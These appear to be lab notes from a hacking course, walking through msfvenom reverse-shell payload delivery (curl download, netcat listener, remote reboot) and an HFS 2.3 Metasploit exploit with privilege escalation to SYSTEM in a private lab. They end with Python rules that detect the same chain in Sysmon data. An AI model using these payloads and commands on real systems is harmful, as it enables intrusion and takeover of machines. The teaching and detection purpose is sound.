Metasploit Framework
===

# msfvenom (tool for generating payloads)

Attacker

```
┌──(kali㉿kali)-[~/NTUST-Hacking]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.230.128 LPORT=8787 -f exe -o virus.exe
```

```
┌──(kali㉿kali)-[~/NTUST-Hacking]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

Victim

```
C:\Users\Red>curl http://192.168.230.128:80/virus.exe > virus.exe
```

Attacker

```
┌──(kali㉿kali)-[~/NTUST-Hacking]
└─$ netcat -lvnp 8787
listening on [any] 8787 ...
```

Victim

```
C:\Users\Red>virus.exe
```

Attacker

```
┌──(kali㉿kali)-[~/NTUST-Hacking]
└─$ netcat -lvnp 8787
listening on [any] 8787 ...
connect to [192.168.230.128] from (UNKNOWN) [192.168.230.129] 50152
Microsoft Windows [Version 10.0.22621.4169]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Red>shutdown /r /t 0
shutdown /r /t 0
```

# msfconsole (tool for launching exploits)

Attacker

```
┌──(kali㉿kali)-[~/NTUST-Hacking]
└─$ nmap -sV -sC 192.168.230.129
PORT     STATE SERVICE VERSION
...
8080/tcp open  http    HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
...
```

Search online for whether HFS 2.3 has any known vulnerabilities.

![image](https://hackmd.io/_uploads/Bywm42oTA.png)

```
┌──(kali㉿kali)-[~/NTUST-Hacking]
└─$ msfconsole
...
msf6 > search HFS 2.3

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   ...
   4  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution
   ...

msf6 > info exploit/windows/http/rejetto_hfs_exec
```

Decide to use the exploit/windows/http/rejetto_hfs_exec module.

```
msf6 > use exploit/windows/http/rejetto_hfs_exec
msf6 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.230.129  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.230.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOST 192.168.230.129
msf6 exploit(windows/http/rejetto_hfs_exec) > set RPORT 8080
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 192.168.230.128:4444
[*] Using URL: http://192.168.230.128:8080/kwasbp
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /kwasbp
[*] Sending stage (176198 bytes) to 192.168.230.129
[!] Tried to delete %TEMP%\yuqCgIpSBxjZnA.vbs, unknown result
[*] Meterpreter session 1 opened (192.168.230.128:4444 -> 192.168.230.129:49868) at 2024-09-20 23:29:21 -0400
[*] Server stopped.

meterpreter > sysinfo
Computer        : NTUST-HACKING-1
OS              : Windows 11 (10.0 Build 22621).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NTUST-HACKING-1\Red
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 4552 created.
Channel 2 created.
Microsoft Windows [Version 10.0.22621.4169]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Red\Desktop\hfs2.3_288>powershell -ep bypass
powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\Red\Desktop\hfs2.3_288>
```
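# Detecting this chain on the victim

The session above leaves a distinctive process-creation trail on the Windows host: the HFS server process spawning a command shell, a script run out of `%TEMP%` (the `.vbs` the module tried to delete), and PowerShell started with `-ep bypass`. The Python below is an added example, not part of the lab notes or of Metasploit; it runs those three checks over constructed Sysmon-style (Event ID 1) records. The hfs.exe parent/child relationship and the command lines are assumptions modelled on the transcript, not real telemetry.

```python
import re

# Constructed Sysmon Event ID 1 records (simplified) modelled on the walkthrough.
# The hfs.exe -> cmd.exe edge and command lines are assumed, not captured data.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\Red\Desktop\hfs2.3_288\hfs.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c %TEMP%\yuqCgIpSBxjZnA.vbs"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -ep bypass"},
    {"ParentImage": r"C:\Windows\explorer.exe",            # benign admin usage
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoProfile -File C:\Scripts\backup.ps1"},
]

# Web server binaries that should never have a shell as a child process.
WEB_SERVER_IMAGES = {"hfs.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# "-ep bypass" / "-ExecutionPolicy Bypass", case-insensitive.
EP_BYPASS = re.compile(r"(?:-ep|-executionpolicy)\s+bypass", re.I)
# Any script launched from the %TEMP% directory.
TEMP_SCRIPT = re.compile(r"%TEMP%\\[^\s\"]+\.(?:vbs|ps1|bat)", re.I)


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule_name, image) hits, in event order, for the three checks."""
    hits = []
    for ev in events:
        parent, image = basename(ev["ParentImage"]), basename(ev["Image"])
        cmd = ev["CommandLine"]
        if parent in WEB_SERVER_IMAGES and image in SHELL_IMAGES:
            hits.append(("web_server_spawned_shell", image))
        if TEMP_SCRIPT.search(cmd):
            hits.append(("script_run_from_temp", image))
        if image == "powershell.exe" and EP_BYPASS.search(cmd):
            hits.append(("powershell_execution_policy_bypass", image))
    return hits


if __name__ == "__main__":
    for rule, image in detect(SAMPLE_EVENTS):
        print(f"{rule}: {image}")
```

The benign third event (PowerShell from Explorer with a signed-policy-compatible `-File` run) produces no hit, which is the false-positive case these rules are tuned to avoid.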